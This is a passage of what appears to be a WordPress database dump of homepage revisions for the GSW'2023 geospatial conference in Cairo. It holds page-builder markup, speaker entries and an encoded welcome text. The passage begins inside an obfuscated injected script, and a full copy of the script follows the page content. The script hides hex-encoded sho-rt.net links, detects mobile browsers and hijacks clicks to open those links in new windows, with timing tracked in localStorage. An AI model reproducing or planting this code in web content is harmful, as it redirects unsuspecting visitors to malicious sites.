_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:16:35','2022-10-06 20:16:35','',2167,'https://gsw2023.com/?p=2328',0,'revision','',0),
(2329,1,'2022-10-06 20:18:11','2022-10-06 20:18:11','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665119554164{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #FFFFFF), color-stop(54%, #FFFFFF), color-stop(81%, #FFFFFF), color-stop(95%, #FFFFFF));background: -moz-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -webkit-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -o-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -ms-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#0367bf\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_masonry_media_grid element_width=\"6\" grid_id=\"vc_gid:1665119259246-2c5e5f13-c051-1\" include=\"2325,2326\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:18:11','2022-10-06 20:18:11','',2167,'https://gsw2023.com/?p=2329',0,'revision','',0),
(2330,1,'2022-10-06 20:23:53','2022-10-06 20:23:53','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" 